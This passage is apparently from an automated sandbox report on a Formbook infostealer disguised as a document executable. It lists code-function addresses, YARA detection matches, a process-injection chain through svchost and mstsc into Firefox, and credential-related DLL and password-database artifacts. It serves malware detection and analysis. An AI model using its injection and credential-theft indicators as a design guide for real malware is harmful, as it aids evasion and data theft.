            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFB761_2_033FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335FB801_2_0335FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B5BF01_2_033B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337DBF91_2_0337DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B3A6C1_2_033B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFA491_2_033FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F7A461_2_033F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DDAAC1_2_033DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03385AA01_2_03385AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E1AA31_2_033E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EDAC61_2_033EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D59101_2_033D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033499501_2_03349950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335B9501_2_0335B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AD8001_2_033AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFF091_2_033FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFFB11_2_033FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03341F921_2_03341F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03303FD21_2_03303FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03303FD51_2_03303FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03349EB01_2_03349EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F7D731_2_033F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F1D5A1_2_033F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03343D401_2_03343D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335FDC01_2_0335FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B9C321_2_033B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFCF21_2_033FFCF2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046124463_2_04612446
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046044203_2_04604420
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460E4F63_2_0460E4F6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045605353_2_04560535
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046205913_2_04620591
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0457C6E03_2_0457C6E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045847503_2_04584750
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045607703_2_04560770
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0455C7C03_2_0455C7C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045F20003_2_045F2000
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045E81583_2_045E8158
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045FA1183_2_045FA118
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045501003_2_04550100
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046181CC3_2_046181CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046141A23_2_046141A2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046201AA3_2_046201AA
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046002743_2_04600274
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045E02C03_2_045E02C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461A3523_2_0461A352
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046203E63_2_046203E6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456E3F03_2_0456E3F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04560C003_2_04560C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04550CF23_2_04550CF2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04600CB53_2_04600CB5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045FCD1F3_2_045FCD1F
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456AD003_2_0456AD00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0455ADE03_2_0455ADE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04578DBF3_2_04578DBF
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04560E593_2_04560E59
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461EE263_2_0461EE26
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461EEDB3_2_0461EEDB
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04572E903_2_04572E90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461CE933_2_0461CE93
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045D4F403_2_045D4F40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04602F303_2_04602F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04580F303_2_04580F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045A2F283_2_045A2F28
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04552FC83_2_04552FC8
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045DEFA03_2_045DEFA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045628403_2_04562840
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456A8403_2_0456A840
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0458E8F03_2_0458E8F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045468B83_2_045468B8
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045769623_2_04576962
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0462A9A63_2_0462A9A6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045629A03_2_045629A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0455EA803_2_0455EA80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461AB403_2_0461AB40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04616BD73_2_04616BD7
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045514603_2_04551460
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461F43F3_2_0461F43F
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046175713_2_04617571
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046295C33_2_046295C3
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045FD5B03_2_045FD5B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045A56303_2_045A5630
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046116CC3_2_046116CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461F7B03_2_0461F7B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461F0E03_2_0461F0E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046170E93_2_046170E9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045670C03_2_045670C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460F0CC3_2_0460F0CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0462B16B3_2_0462B16B
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0454F1723_2_0454F172
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0459516C3_2_0459516C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0456B1B03_2_0456B1B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_046012ED3_2_046012ED
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0457B2C03_2_0457B2C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0457D2F03_2_0457D2F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045652A03_2_045652A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0454D34C3_2_0454D34C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461132D3_2_0461132D
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045A739A3_2_045A739A
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045D9C323_2_045D9C32
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461FCF23_2_0461FCF2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04617D733_2_04617D73
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04563D403_2_04563D40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04611D5A3_2_04611D5A
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0457FDC03_2_0457FDC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04569EB03_2_04569EB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461FF093_2_0461FF09
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04523FD23_2_04523FD2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04523FD53_2_04523FD5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04561F923_2_04561F92
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461FFB13_2_0461FFB1
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045CD8003_2_045CD800
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045638E03_2_045638E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045699503_2_04569950
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0457B9503_2_0457B950
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045F59103_2_045F5910
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04617A463_2_04617A46
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461FA493_2_0461FA49
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045D3A6C3_2_045D3A6C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0460DAC63_2_0460DAC6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04601AA33_2_04601AA3
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045FDAAC3_2_045FDAAC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045A5AA03_2_045A5AA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0461FB763_2_0461FB76
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0459DBF93_2_0459DBF9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045D5BF03_2_045D5BF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0457FB803_2_0457FB80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02651B503_2_02651B50
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0264CA793_2_0264CA79
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0264CA803_2_0264CA80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0264CCA03_2_0264CCA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0264AD203_2_0264AD20
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_026533C03_2_026533C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_026551E03_2_026551E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0266B7B03_2_0266B7B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0443540C3_2_0443540C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0442E4953_2_0442E495
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0442E3783_2_0442E378
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04433F693_2_04433F69
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0442E8333_2_0442E833
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0442D8983_2_0442D898
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0442CA833_2_0442CA83
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0442CB583_2_0442CB58
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: String function: 00737750 appears 42 times
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: String function: 0072F885 appears 68 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 99 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04595130 appears 58 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0454B970 appears 262 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 045CEA12 appears 86 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 045A7E54 appears 107 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 045DF290 appears 103 times
            Source: DOC092024-0431202229487.exe, 00000000.00000003.1690165268.0000000004EF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DOC092024-0431202229487.exe
            Source: DOC092024-0431202229487.exe, 00000000.00000003.1689928244.000000000509D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DOC092024-0431202229487.exe
            Source: DOC092024-0431202229487.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@17/12
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075D712 GetLastError,FormatMessageW,0_2_0075D712
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074B8B0 AdjustTokenPrivileges,CloseHandle,0_2_0074B8B0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0074BEC3
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0075EA85
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00756F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00756F5B
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00751050 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,0_2_00751050
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007131F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007131F2
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeFile created: C:\Users\user\AppData\Local\Temp\aut2195.tmpJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: mstsc.exe, 00000003.00000003.1964297802.0000000002865000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1964406091.0000000002886000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4143406843.0000000002886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DOC092024-0431202229487.exeReversingLabs: Detection: 23%
            Source: DOC092024-0431202229487.exeVirustotal: Detection: 29%
            Source: unknownProcess created: C:\Users\user\Desktop\DOC092024-0431202229487.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"Jump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeSection loaded: fwpuclnt.dllJump to behavior
